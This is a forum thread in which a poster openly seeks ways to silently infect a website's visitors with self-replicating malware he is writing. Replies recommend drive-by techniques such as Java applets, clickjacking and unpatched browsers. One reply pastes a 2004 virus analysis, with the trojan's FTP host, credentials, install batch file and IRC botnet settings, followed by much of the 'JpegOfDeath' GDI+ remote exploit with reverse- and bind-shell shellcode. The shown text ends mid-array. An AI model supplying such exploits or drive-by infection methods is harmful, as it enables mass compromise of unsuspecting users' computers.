hey, just some background, im a software engineer / web application developer for a company ive been programming for 10+ years and professionally for about 4. I am strong when it comes to web development, programming, graphics, hardware/microcontrollers, networking, but lacking in the security realm. I give this background so nobody thinks im some 16 year old kid wanting to be a 1337 haxor and disregarding my question due to ignorance.
If one put a website up that replicated an existing site, is there an exploit that has been found to push a file download to the client machine without any notification? Ive heard there is a way with javascript and temporary internet files but i have not found any info on that.
If not, what is the best way to transfer a file to a client machine without using social engineering, normal downloads, file binding and other very strait forward attacks? I have some web servers, the servers can support almost any server side language php,asp,asp.net, ruby etc...
It depends solely on which browser/version the client is running. Most all browsers are sandboxed making this task infinitely more complex. Moreover, most companies (google, mozilla, etc) offer a bounty for critical backdoors and release a patch within days if not hours. Nearly all such backdoors are done through vulnerabilities in how a browser handles embedded apps (java apps, flash, adobe reader, etc). This isn't to say finding a backdoor is impossible. Google ran a chrome hackathon a few months back and a 20 something year old CS grad found a backdoor bypassing the sandbox which netted him 10k cash and a job with google.
All critical vulnerabilities for past browser releases are well documented. If you have a specific target in mind your best bet would be to grab the header data of the target. Chances are if he or she is not a "techy" they will not be running the latest version of their browser. With this information, you can search for known backdoors present in unpatched versions of that browser. Chances are you can even find working code or pre existing apps to execute an attack. If they're running, for example, the most recent chrome distro fully patched then you may be SOL
Acquaint yourself with metasploit or a similar pen testing software. Also, there a tons of applications that access internet data (therefore acting as an impromptu browser). Most of these are not sandboxed and finding a backdoor is much more likely than finding one with one within a top 5 browser
ActiveX used to be the way to go quite a few years back when you wanted to do something like that but those days are pretty much long gone. These days people are a bit more in tune to what they do on the computers so it's slightly more time consuming to trick people. Though, click jacking is still a big thing these days and it's a little bit harder to fight against it. Might try looking into that?
__________________
Quote:
Originally Posted by -SpectraL
Some people just like to be argumentative about stuff nobody should really give a fuck about.
The following users say "It is so good to hear it!":
hmm, click jacking? i see what it is but i cant find a very good example of what i would need it for, i could put up a fake product to download a file they are not expecting but that is obvious.
are you going down the lines of having a user click a link wich runs some javascript which in turn will run a download and automatically accept it? im not to clear on how this would work for my "needs". i want to spread a file i created to as many computers as possible to form a network. it is self replicating so it can spread through flashdrives and any exe file but as a developer ive always written these types of files but never ones apable of spreading to specific group of people. maybe theres a better way to spread this? im sure if i append the code to an image it cant be executed locally on a remote machine, so im kinda stumped on how to make this file spread itself. i can code whatever is needed im just lacking on ideas for methods on geting it out there.
as i said i have access to servers, high traffic web pages, in depth programming abilities, email lists, and large ip databases.
is there a better way? or a way to send files based on ip and open ports? i heard there may be a way to do this?
Most exploits have a very low infection rate such as Blackhole (in its prime anyway) got 15% tops but they were mostly shit slaves. You're better trying to find a better exploit in other programs than browsers.
__________________
Kill yourself list - FuckBiscuit, 888, &Zenith, Duke Zion, Anything that likes sploogook, sploogook, annnnnnnnnnnnd -Kite.
I find that JavaDriveby's still hit a LOT of users, depending on the targetted audience. Yes, they get a pop-up for you to let Java run, but if it is a site where they expect Java to run, you will still get a decent percentage of people allowing it.
__________________
Damnit, now I need to get an &t tattoo.
Then, there are many more ways to 'put' a file onto their computer, without their knowledge it's you, and without physical access. Doing it with a website is...going to be much trickier.
And, using an executable file is going to make things exponentially more difficult, especially when you can embed malicious software in such files as adobe PDF's. Think outside the box, but with the info you've given there's not much I can tell you.
seems to outdated, its a remote jpeg expoit to allow the attacker to connect back to the infected once opened in explorer, i think this was patched in xp sp2, also you changed it and for the life of me i cant read that hex, every output i produce is unreadable. and i cant compile that since i cant read the shellscript or header array and i sure as hell dont want some random script executing on my system.
This code is very simple except for the character arrays, every time i output them i am getting unreadable text and id like to see what commands it is performing and what it is actually exploiting, any ideas?
also my target audience will be whoever visits the site, it is possible to get them to download an exe but id need to bind it and id like to write my own binder if that is the case. and a java drive by would be ideal, i will look into that. any info i may need would be favorable and i would appreciate it greatly!
I need this on a website because i do not want to infect a single user, or even a dozen. i have a whole demographic of people, and am looking for maybe 2-10% infection rate of whoever visits the site. I have advertising, servers, domain names and everything i need i just dont have the exploit i need yet but the file is being written now in c++ and im going to bind it with another app i wrote if it has to be downloaded as an executable.
seems to outdated, its a remote jpeg expoit to allow the attacker to connect back to the infected once opened in explorer, i think this was patched in xp sp2, also you changed it and for the life of me i cant read that hex, every output i produce is unreadable. and i cant compile that since i cant read the shellscript or header array and i sure as hell dont want some random script executing on my system.
This code is very simple except for the character arrays, every time i output them i am getting unreadable text and id like to see what commands it is performing and what it is actually exploiting, any ideas?
also my target audience will be whoever visits the site, it is possible to get them to download an exe but id need to bind it and id like to write my own binder if that is the case. and a java drive by would be ideal, i will look into that. any info i may need would be favorable and i would appreciate it greatly!
I need this on a website because i do not want to infect a single user, or even a dozen. i have a whole demographic of people, and am looking for maybe 2-10% infection rate of whoever visits the site. I have advertising, servers, domain names and everything i need i just dont have the exploit i need yet but the file is being written now in c++ and im going to bind it with another app i wrote if it has to be downloaded as an executable.
Even though it's true it's old (2004), I tested it on my own machine just a few weeks with WinXP SP3 and it worked like a charm. I setup a quick ftp server and put calc.exe in the home folder, edited the jpeg's download URL, and as soon as I hovered my mouse over either the .jpeg itself or even entered the folder it was in it immediately downloaded and ran calc.exe on my system in the background, right through my router and updated Avast scanner/AntiMalware. Lots of times they say they've patched something but they really haven't.
Code:
jpeg virus in the wild?!
UPDATE: To check to see if you have been infected by this virus, look for a directory
named c:\windows\system32\system\ that has nvsvc.exe and winrun.exe in it.
UPDATE: We have packet logs at http://easynews.com/virus/ THIS VIRUS IS NASTY!
If you don't know what a jpeg virus is, check out:
http://news.google.com/news?q=jpeg+virus
Swany and I wrote a quick and nasty script to scan every jpeg that comes into Easynews.com.. It paged
my cell phone at 6:47pm PDT on 9/26/2004 for the first hit, and 7:52pm PDT on 9/26/2004 for
the second hit.
Once this JPEG overflowed GDI+, it phoned home, connected to and ftp site and downloaded
almost 2megs of stuff. It installs a trojan that installs itself as a service.
It also installs radmin (radmin.com) running as 'r_server'. From the radmin.com site, "With Radmin you
can work on a remote computer exactly as if you were right there at its keyboard."
It phones home to the same IP that is in the usenet post headers. Then it seems
to connect to ftp://209.171.43.27/www/system/ u/p bawz/pagdba (last time I checked, 93 users where logged in!)
it downloads these files:
-rw-r--r-- 1 root root 90112 Sep 27 09:43 AdmDll.dll
-rw-r--r-- 1 root root 114688 Sep 27 09:43 Fport.exe
-rw-r--r-- 1 root root 663 Sep 27 09:43 ServUStartUpLog.txt
-rw-r--r-- 1 root root 32768 Sep 27 09:43 VNCHooks.dll
-rw-r--r-- 1 root root 1407 Sep 27 09:43 WinRun.dll
-rw-r--r-- 1 root root 811008 Sep 27 09:43 WinRun.exe
-rw-r--r-- 1 root root 1268 Sep 27 09:43 driver.log
-rw-r--r-- 1 root root 24576 Sep 27 09:43 drives.exe
-rw-r--r-- 1 root root 150 Sep 27 09:43 execute.bat
-rw-r--r-- 1 root root 0 Sep 27 09:43 filter3.ocx
-rw-r--r-- 1 root root 1052 Sep 27 09:43 irc-u.cfg
-rw-r--r-- 1 root root 0 Sep 27 09:43 irc-u.dat
-rw-r--r-- 1 root root 16802 Sep 27 09:43 irc-u.debug.log
-rw-r--r-- 1 root root 102400 Sep 27 09:43 irc-u.dll
-rw-r--r-- 1 root root 26624 Sep 27 09:43 kill.exe
-rw-r--r-- 1 root root 59392 Sep 27 09:43 nc.exe
-rw-r--r-- 1 root root 241664 Sep 27 09:43 nvsvc.exe
-rw-r--r-- 1 root root 36864 Sep 27 09:43 nvsvc32.dll
-rw-r--r-- 1 root root 45056 Sep 27 09:43 omnithread_rt.dll
-rw-r--r-- 1 root root 34304 Sep 27 09:43 peek.exe
-rw-r--r-- 1 root root 29408 Sep 27 09:43 raddrv.dll
-rw-r--r-- 1 root root 713 Sep 27 09:43 radmin.reg
-rw-r--r-- 1 root root 26112 Sep 27 09:43 rcrypt.exe
-rw-r--r-- 1 root root 40960 Sep 27 09:43 reg.exe
-rw-r--r-- 1 root root 6656 Sep 27 09:43 uptime.exe
-rw-r--r-- 1 root root 208896 Sep 27 09:43 vns.exe
and executes 'execute.bat', which looks like:
regedit.exe /s radmin.reg
nvsvc.exe /install /silence
nvsvc.exe /pass:hardcore /port:10002 /save /silence
nvsvc.exe /start /silence
net start r_server
it also installs an irc client with this config info:
server1=irc.p2pchat.net
port1=7777
login=Darkbro0d
channel=#FurQ
password=letmein
nick1=Track100Mbit
nick2=Trck100#1
sfv=1
user=Trackmaster
login=darkbro0d
Here is the data:
The isolated file is here (BE CAREFUL - DON'T SUE ME FOR DAMAGE, I'LL COUNTER-SUE!):
http://easynews.com/virus/virus-jpeg.zip
md5: b7e7a5703a722558b6a170be5c43b90d
crc32:a3e0f71e
size: 4098 bytes
Here is the first message header:
Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!cyclone1.gnilink.net!gnilink.net!wn14feed!worldnet.att.net!204.71.34.3!newsfeed.cwix.com!newsfeed.icl.net!newsfeed.wirehub.nl!news.cambrium.nl!news.cambrium.nl!news2.euro.net!62.253.162.219.MISMATCH!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe3-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.multimedia.erotica.transsexuals,alt.binaries.pictures.erotica.transexual,alt.binaries.pictures.erotica.transexual.action,alt.binaries.pictures.erotica.transsexual
Subject: (Shemale-loves it up the ass.jpg (1/1)] [1/1] - Shemale loves it up the ass
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <A_J5d.105$24.101@newsfe3-win.ntli.net>
Date: Mon, 27 Sep 2004 01:25:52 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe3-win.ntli.net 1096248352 82.1.163.241 (Mon, 27 Sep 2004 02:25:52 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 02:25:52 BST
Organization: NTL
Xref: core-easynews alt.binaries.multimedia.erotica.transsexuals:1756301 alt.binaries.pictures.erotica.transexual:393069 alt.binaries.pictures.erotica.transexual.action:2666691 alt.binaries.pictures.erotica.transsexual:207823
X-Received-Date: Sun, 26 Sep 2004 19:19:51 MST (news.easynews.com)
And here is the second header:
Path: news.easynews.com!core-easynews!newsfeed2.easynews.com!newsfeed1.easynews.com!easynews.com!easynews!bigfeed2.bellsouth.net!bigfeed.bellsouth.net!news.bellsouth.net!news-in.ntli.net!newsrout1-win.ntli.net!ntli.net!newspeer1-win.ntli.net!newsfe2-win.ntli.net.POSTED!53ab2750!not-for-mail
From: Power-Poster@power-post.org (Power-Post 2000)
Sender: Power-Poster@power-post.org
Newsgroups: alt.binaries.erotica.beanie-babies,alt.binaries.erotica.breasts,alt.binaries.erotica.christy-canyon,alt.binaries.erotica.fetish,alt.binaries.erotica.original.sin,alt.binaries.erotica.pornstar
Subject: (Beautiful 20yr old - double penetration.jpg (1/1)] [1/1] - 20yr old double penetration
X-Newsposter: NNTP POWER-POST 2000 (Build 24c) - net-toys.8k.com
Lines: 96
Message-ID: <S2L5d.341$wW2.317@newsfe2-win.ntli.net>
Date: Mon, 27 Sep 2004 02:38:42 GMT
NNTP-Posting-Host: 82.1.163.241
X-Trace: newsfe2-win.ntli.net 1096252722 82.1.163.241 (Mon, 27 Sep 2004 03:38:42 BST)
NNTP-Posting-Date: Mon, 27 Sep 2004 03:38:42 BST
Organization: NTL
Xref: core-easynews alt.binaries.erotica.beanie-babies:884786 alt.binaries.erotica.breasts:1112072 alt.binaries.erotica.christy-canyon:368690 alt.binaries.erotica.fetish:1386267 alt.binaries.erotica.original.sin:1793 alt.binaries.erotica.pornstar:831729
X-Received-Date: Sun, 26 Sep 2004 20:12:42 MST (news.easynews.com)
Here is a 'djpeg' output:
djpeg -debug b7e7a5703a722558b6a170be5c43b90d0a3e0f71e.jpg > /dev/null
Independent JPEG Group's DJPEG, version 6b 27-Mar-1998
Copyright (C) 1998, Thomas G. Lane
Start of Image
JFIF APP0 marker: version 1.02, density 100x100 0
APP12, length 15:
Ducky\000\001\000\004\000\000\000
\000\000
Adobe APP14 marker: version 100, flags 0xc000 0x0000, transform 1
Comment, length -1:
Corrupt JPEG data: 130 extraneous bytes before marker 0xc0
Start Of Frame 0xc0: width=555, height=857, components=3
Component 1: 2hx2v q=0
Component 2: 1hx1v q=1
Component 3: 1hx1v q=1
Define Huffman Table 0x00
Define Huffman Table 0x01
Define Huffman Table 0x10
Define Huffman Table 0x11
Start Of Scan: 3 components
Component 1: dc=0 ac=0
Component 2: dc=1 ac=1
Component 3: dc=1 ac=1
Ss=0, Se=63, Ah=0, Al=0
Quantization table 0x00 was not defined
Here is a 'strings' output:
JFIF
Ducky
Adobe
p&.>55555>
DDDDDDDDDDDDD
&6& &6D6++6DDDB5BDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
"2BR
j0_R
}tL#
xgTYdG
<kF`
k>iv
k$bAa
cspkkj
nXc|3
Y9cY
.IBmRp9b
4$XXXX
mmmmm
emDXOR
-- godzilla
EASYNEWS ROCKS!
ps: sample exploit code:
/***************************************************************
*
* GDI+ JPEG Remote Exploit
* By John Bissell A.K.A. HighT1mes
*
* Exploit Name:
* =============
* JpegOfDeath.c v0.5
*
* Date Exploit Released:
* ======================
* Sep, 23, 2004
*
* Description:
* ============
* Exploit based on FoToZ exploit but kicks the exploit up
* a notch by making it have reverse connectback as well as
* bind features that will work with all NT based OS's.
* WinNT, WinXP, Win2K, Win2003, etc... Thank you FoToz for
* helping get a grip on the situation. I actually had got
* bind jpeg exploit working earlier but I could only
* trigger from OllyDbg due to the heap dynamically changing...
*
* If anyone who uses this exploit has used my recent AIM
* remote exploit then you will have a good idea already of how
* to use this exploit correctly.
*
* Through my limited testing I have found on a unpatched
* XP SP1 system that if you click the exploit jpeg file
* in Windows Explorer then you will be hacked. I know there
* are more attack points you can take advantage of if you
* look for them.. So say someone goes on any web browser
* and they decide to save your jpeg and then later open it
* in explorer.exe then they will be attacked.. or maybe they
* got a email that has a good filename attachment title to
* it like "daisey fuentes porn pic.jpg" well then they
* want to see it so they save it to there harddrive and open
* the pic in explorer.exe and game over. You just have to
* test and get creative. The reason this is version 0.5 is
* because I know rundll32.exe is MAJORALLY exploitable and I know
* that would make this exploit far more powerful if I
* figured that part out.. I have already exploited it
* personally myself but I need to run some more tests to
* make things final for everyone... On another side note
* for the people out there who think you can only be affected
* through viewing or downloading a jpeg attachment.. you're
* dead wrong.. All the attacker has to do is simply change
* image extension from .jpg to .bmp or .tif or whatever
* and stupid Windows will still treat the file as a JPEG :-p...
* Also the fact is this vulnerability is exploitable
* without the victim clicking a link... For instance you
* send them the image with a 1,1 width,height and then'
* they can't see it in Outlook Express, so there like
* man this image has a cool name so I'll try to open the
* attachment, then there FUCKED... Well ok they have to
* click in a round-about-way.. but I'm sure if you're
* creative enough with all those MS features you can figure
* something out ;-)
*
* I'll most likely be putting out another version of this
* exploit (more dangerous) once more testing has been done. So
* I encourage everyone out there to download SP2, patch your
* Windows systems, etc... Of course this won't be a
* cure all solution :-/
*
* Note:
* =====
* If someone wants to take advantage of the bind mode of
* attack in this exploit you will need to set up a script
* on a web server to check everyone who downloads the
* jpeg exploit file and then connect back to them on the
* port you wanted to use with the bind attack... One of
* the reasons I decided to keep the bind shellcode option
* in here is because sometimes as you people know a
* firewall will be more restrictive on outbound connections
* and there are times where a bind attack will do just right
* if the reverse connect attack won't work... On ANOTHER
* note you can also rename your jpeg file extension to
* something like a .bmp or .tif and dumb Windows program's
* (most of them) won't give give a shit and try to load the
* jpeg anyways... You can easily trick unsuspecting people
* this way.. which is pretty much everyone.. right??
*
* Greetings:
* ==========
* FoToZ, Nick DeBaggis, MicroSoft, Anthony Rocha, #romhack
* Peter Winter-Smith, IsolationX, YpCat, Aria Giovanni,
* Nick Fitzgerald, Adam Nance (where are you?),
* Santa Barbara, Jenna Jameson, John Kerry, so1o,
* Computer Security Industry, Rom Hackers, My chihuahuas
* (Rocky, Sailor, and Penny)...
*
*
* Disclaimer:
* ===========
* THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
* IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
* OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
* IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
* THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
* Look out for a better version of this exploit in a few days.. perhaps...
*
********************************************************************/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
/* Exploit Data... */
char reverse_shellcode[] =
"\xD9\xE1\xD9\x34"
"\x24\x58\x58\x58\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\xAC\xFE\x80"
"\x30\x92\x40\xE2\xFA\x7A\xA2\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB"
"\x54\xEB\x7E\x6B\x38\xF2\x4B\x9B\x67\x3F\x59\x7F\x6E\xA9\x1C\xDC"
"\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C\x21\x84\xC5\xC1"
"\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6\x1B\x77\x1B\xCF"
"\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2\x8E\x3F\x19\xCA"
"\x9A\x79\x9E\x1F\xC5\xB6\xC3\xC0\x6D\x42\x1B\x51\xCB\x79\x82\xF8"
"\x9A\xCC\x93\x7C\xF8\x9A\xCB\x19\xEF\x92\x12\x6B\x96\xE6\x76\xC3"
"\xC1\x6D\xA6\x1D\x7A\x1A\x92\x92\x92\xCB\x1B\x96\x1C\x70\x79\xA3"
"\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92\x6D\xC7\x8A\xC5"
"\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x86\x1B\x51\xA3\x6D\xFA\xDF"
"\xDF\xDF\xDF\xFA\x90\x92\xB0\x83\x1B\x73\xF8\x82\xC3\xC1\x6D\xC7"
"\x82\x17\x52\xE7\xDB\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x54"
"\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xCE\xB6\xDA\x1B"
"\xCE\xB6\xDE\x1B\xCE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3\xC3"
"\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xBA\x1B\x73\x79\x9C"
"\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xB6\xC5\x6D\xC7\x9E\x6D\xC7"
"\xB2\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97\xEA"
"\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6\x19"
"\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F\x93"
"\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4\x19"
"\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3\x52"
"\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char bind_shellcode[] =
"\xD9\xE1\xD9\x34\x24\x58\x58\x58"
"\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"
"\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"
"\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"
"\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"
"\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"
"\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"
"\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"
"\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"
"\x94\xE6\x76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"
"\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"
"\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"
"\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"
"\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"
"\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"
"\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"
"\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"
"\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"
"\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"
"\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"
"\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"
"\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"
"\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"
"\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"
"\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";
char header1[] =
"\xFF\xD8\xFF\xE0\x00\x10\x4A\x46\x49\x46\x00\x01\x02\x00\x00\x64"
"\x00\x64\x00\x00\xFF\xEC\x00\x11\x44\x75\x63\x6B\x79\x00\x01\x00"
"\x04\x00\x00\x00\x0A\x00\x00\xFF\xEE\x00\x0E\x41\x64\x6F\x62\x65"
"\x00\x64\xC0\x00\x00\x00\x01\xFF\xFE\x00\x01\x00\x14\x10\x10\x19"
"\x12\x19\x27\x17\x17\x27\x32\xEB\x0F\x26\x32\xDC\xB1\xE7\x70\x26"
"\x2E\x3E\x35\x35\x35\x35\x35\x3E";
char setNOPs1[] =
"\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x00\x05\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char setNOPs2[] =
"\x3E\xE8\x00\x00\x00\x00\x5B\x8D\x8B"
"\x2F\x00\x00\x00\x83\xC3\x12\xC6\x03\x90\x43\x3B\xD9\x75\xF8";
char header2[] =
"\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x01\x15\x19\x19"
"\x20\x1C\x20\x26\x18\x18\x26\x36\x26\x20\x26\x36\x44\x36\x2B\x2B"
"\x36\x44\x44\x44\x42\x35\x42\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44"
"\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\x44\xFF\xC0\x00"
"\x11\x08\x03\x59\x02\x2B\x03\x01\x22\x00\x02\x11\x01\x03\x11\x01"
"\xFF\xC4\x00\xA2\x00\x00\x02\x03\x01\x01\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x03\x04\x01\x02\x05\x00\x06\x01\x01\x01\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02"
"\x03\x10\x00\x02\x01\x02\x04\x05\x02\x03\x06\x04\x05\x02\x06\x01"
"\x05\x01\x01\x02\x03\x00\x11\x21\x31\x12\x04\x41\x51\x22\x13\x05"
"\x61\x32\x71\x81\x42\x91\xA1\xC1\x52\x23\x14\xB1\xD1\x62\x15\xF0"
"\xE1\x72\x33\x06\x82\x24\xF1\x92\x43\x53\x34\x16\xA2\xD2\x63\x83"
"\x44\x54\x25\x11\x00\x02\x01\x03\x02\x04\x03\x08\x03\x00\x02\x03"
"\x01\x00\x00\x00\x00\x01\x11\x21\x31\x02\x41\x12\xF0\x51\x61\x71"
"\x81\x91\xA1\xB1\xD1\xE1\xF1\x22\x32\x42\x52\xC1\x62\x13\x72\x92"
"\xD2\x03\x23\x82\xFF\xDA\x00\x0C\x03\x01\x00\x02\x11\x03\x11\x00"
"\x3F\x00\x0F\x90\xFF\x00\xBC\xDA\xB3\x36\x12\xC3\xD4\xAD\xC6\xDC"
"\x45\x2F\xB2\x97\xB8\x9D\xCB\x63\xFD\x26\xD4\xC6\xD7\x70\xA4\x19"
"\x24\x50\xCA\x46\x2B\xFC\xEB\x3B\xC7\xC9\xA5\x4A\x8F\x69\x26\xDF"
"\x6D\x72\x4A\x9E\x27\x6B\x3E\xE6\x92\x86\x24\x85\x04\xDB\xED\xA9"
"\x64\x8E\x6B\x63\x67\x19\x1A\xA5\xE7\xB8\x28\x3D\x09\xAB\x5D\x5F"
"\x16\xF7\x8C\xED\x49\x4C\xF5\x01\xE6\xE5\xD5\x1C\x49\xAB\x10\x71"
"\xA6\x36\x9B\x93\x24\x61\x00\x0F\x61\xEC\x34\xA7\x9C\x23\xF4\x96"
"\xC6\xE6\xAF\xB7\x80\x76\xEF\x93\xF0\xAA\x28\x8A\x6B\xE0\x18\xC0"
"\xA4\x9B\x7E\x90\x39\x03\xC2\x90\xDC\x43\x31\x91\x62\x91\x86\x23"
"\x35\x35\xA2\x80\x4D\xFA\x72\x31\x07\x9D\x03\x70\xA8\x93\x24\x4F"
"\x89\x51\x83\x5E\xA4\x2E\x7A\xC0\x7D\xA9\x8A\x10\x61\x64\x07\xFA"
"\x88\xC6\x89\x26\xDA\x0F\x20\xBD\xB9\x16\xD2\xA8\xE8\x91\x3F\x1A"
"\xE2\xBA\xF0\xBE\x74\xAB\x1D\xC4\x44\x15\x1A\x8A\x9C\xC7\x2A\x6B"
"\xA3\x33\xB7\x1E\x88\x47\x69\xA9\x64\x68\x26\xC1\x97\x0B\xD6\x86"
"\x8B\x1B\x29\xC6\x87\xE4\xC7\xFD\xCC\x53\x11\xA5\x9C\x62\x6A\xE5"
"\x40\x37\x61\x89\xF6\xB2\x9C\x2A\x7C\xFD\x05\x6A\x30\x5F\x52\x02"
"\xEB\x72\xBF\x7D\x74\x4C\x23\xB9\x8F\xD8\x78\x67\x54\x59\x64\x47"
"\xC5\x75\x21\x18\xD5\xE3\x58\xE1\x72\x63\xBF\x6D\xBD\xCB\xCA\x82"
"\x65\xE7\xDB\x09\x54\x4F\x0D\x95\x86\x76\xE3\xF2\xA0\x48\x82\x55"
"\xD7\xA6\xCE\xA7\xAA\xDC\x6A\xF1\xA9\x8E\xE0\x35\xC1\xCA\xA1\xD4"
"\x93\xD2\xD6\x39\x95\x3C\x6B\x46\x60\xAC\xC1\x3B\x60\xC9\x70\x84"
"\x8E\xA1\x9A\x9A\x20\x01\x94\xCA\x08\x91\x53\xDC\x01\xB1\xB5\x12"
"\x37\x11\xC6\xC1\xAC\xF1\x11\xD4\x9C\x6B\x3E\x69\x76\xF0\x1D\x7B"
"\x52\x6D\xC9\xA8\x66\x94\xBB\x79\x8F\x7E\xDE\x17\xFD\x4D\xAB\x1E"
"\x76\x7A\xA3\x2B\xE2\x50\x06\xB7\x2C\xEB\x2A\x49\xC9\xEA\x4E\x9B"
"\xE7\xCA\xAF\x1E\xEC\x23\xDC\x8B\xE1\x6B\x5F\x1A\x9B\xE8\x49\x2E"
"\x63\xE5\x03\x32\xCD\x19\xB8\x23\x10\x78\x1F\x85\x5C\x15\x8C\x97"
"\x84\x9B\xDB\x15\x35\x9F\x16\xE0\x1E\x86\xB9\x8F\x97\x11\x4E\xDA"
"\x35\x02\x45\x25\x93\xF8\x55\x24\x17\xB9\x1B\xF5\xC8\x07\xA9\xE2"
"\x2A\x76\xB0\xC2\x37\x01\x95\xAD\x81\xB6\x1C\x6A\xA2\x38\xD9\xAE"
"\xCA\x59\x18\x75\x25\xFF\x00\x81\xAE\xD8\xE8\xBB\x47\x62\xAC\xB7"
